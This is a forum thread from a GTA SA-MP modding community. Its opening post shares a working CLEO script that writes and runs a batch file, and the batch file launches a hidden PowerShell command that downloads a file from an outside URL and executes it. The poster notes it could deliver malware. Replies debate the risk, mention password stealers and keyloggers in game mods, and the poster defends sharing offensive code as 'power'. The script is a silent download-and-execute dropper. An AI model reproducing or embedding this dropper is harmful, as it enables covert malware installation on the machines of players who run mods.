[Presentation] Command line functionality

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
919
Likes
4
Points
18
#1
The code below creates and executes a batch file with instructions to download an image and execute it immediately. The interesting part is that it also could be used for any other application, like malware for example. Or to do some damage to the PC directly from the command line

Tested with:
-Cleo 4.1
-Sampfuncs 5.3.1
-Samp 0.3.7


Code:
/*
The code seems more comlex than the actual working mechanism because of the "wooden" string handling. It seems that "0A9E: writefile" opcode doesn't work if a string pointer is used so the string is cut and step by step written to the file. Also it seems that using too long strings causes the code to ignore them so that's why there are multiple "@write_file" calls instead of 1 with a 1 simple long string.
*/

{$CLEO .cs}
0000: NOP

repeat
wait 50
until 0AFA: is_samp_structures_available

0A9A: [email protected] = openfile "file.bat" mode "wt+"  // IF and SET

alloc [email protected] 500
format [email protected] "powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'http:/" //part of the link
call @write_file 2 file [email protected] string [email protected]
format [email protected] "/motherboard-images.vice.com/content-images/article/20733/1428578997900669.jpg'; " //link
call @write_file 2 file [email protected] string [email protected]
format [email protected] "$file = 'pic.jpg'; $down.DownloadFile($url,$file); "  // 'pic.jpg' is the name the file will have when saved
call @write_file 2 file [email protected] string [email protected]
format [email protected] "$exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"  //executes the file
call @write_file 2 file [email protected] string [email protected]

0A9B: closefile [email protected]

         
//by springfield      
0AA2: [email protected] = "shell32.dll"
if 0AA4: [email protected] = "ShellExecuteA" [email protected]
then
   0AA7: [email protected] push 6 pop 1 params 1 0 0 "file.bat" 0 0 error_code [email protected]  
   if [email protected] <= 32
   then 
   printf "FAILURE: %d" 1000 [email protected]
   end
end
//by springfield 


0A93: end_custom_thread


:write_file
0C17: [email protected] = strlen [email protected]
alloc [email protected] 150

while [email protected] >= 16
    wait 0
    0C24: strncpy destination [email protected] source [email protected] size 16
    
    format [email protected] "%s" [email protected]
    chatmsg "%s %d" -1 [email protected] [email protected]
    0A9E: writefile [email protected] size 16 from [email protected]
    
    [email protected] += 16
    0C17: [email protected] = strlen [email protected]                
end

if [email protected] > 0
then
    format [email protected] "%s" [email protected]
    chatmsg "%s %d" -1 [email protected] [email protected]
    0A9E: writefile [email protected] size [email protected] from [email protected]
end

ret 0
 
OP
OP
monday

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
919
Likes
4
Points
18
#8
guys I really believe it could have a positive impact, i'll try to justify it when i defeat the alcohol(max 4 days;p)pls don't delete, thanks
 

0x688

Wtf I'm not new....
Staff member
Administrator
Joined
Feb 18, 2013
Messages
1,042
Likes
15
Points
38
#9
I made a mod already to protect users against this and more, it needs some refining then I'll release it open source probably also.
 

mistery

Well-Known Member
Joined
Apr 23, 2014
Messages
263
Likes
0
Points
16
#11
yes but who will try a cleo which has "open .bat" and "http://.." inside lol...
anyways, time to find a good decrypter :} if u know what i mean
 

springfield

Well-Known Member
Staff member
Joined
Feb 18, 2005
Messages
2,931
Likes
6
Points
38
Website
www.ugbase.eu
#12
I don't see the point in thinking this is dangerous.

We know 'stealers' and keyloggers exists in CLEO since some years ago(there are some sources posted on this forum actually, HERE), that would steal passwords from sa-mp dialogs, pins from textdraws etc.

I doubt that anybody(mostly russians) that tangled with such things, considering they were using win apis like InternetConnect, HttpSendRequest etc.,  didn't think of using the same exact thing as here, to download/run/install some kind of malware.

CLEOs that are posted in the RELEASE section, are usually decrypted(if needed) and manually checked before being approved.
 

MrChristmas

Well-Known Member
Joined
Jul 29, 2014
Messages
562
Likes
0
Points
16
#13
+ in this days most of the users can decrypt most of the Cleos by themselves and see if they are safe or not to use.
 

PlasticBottle

Well-Known Member
Joined
Jul 13, 2016
Messages
164
Likes
0
Points
16
#14
Yeah, we can decrypt shit and everything, but it's not the case for "X_h4x0r1337_X" who comes here for the first time to download random shit (even though cleos in release are safe)
 
OP
OP
monday

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
919
Likes
4
Points
18
#15
@PlasticBottle @Opcode.eXe @Forever15
sharing this has some nasty potential but there's also the positive side of it. Tools like that are some soft of power. They are equivalent with real life tools like a gun or a big muscle mass. While both can be used for immoral reasons their general positive contribution shouldn't be neglected. I'd compare sharing this code with sharing a protein powder or sharing a tutorial on how to make home made gun for self-defence/counter-attack.

Personally I never considered using any kind of power for unprovoked abuse or malicious purposes and I think that there are a lot of people like that. Who squander as much power as they can through all their life hoping that someday in a dangerous situation it can be used for protection, protection even by means of some sort of counter attack, which would require power like a gun, physical strength or offensive software
 

PlasticBottle

Well-Known Member
Joined
Jul 13, 2016
Messages
164
Likes
0
Points
16
#16
I gues you are right, and also nowadays, there isn't as much malwares as like 3 years ago. Even though we have powerful antiviruses etc, sharing this can be bad. It's like a double-edged sword, we will see how it turns out...
 
Top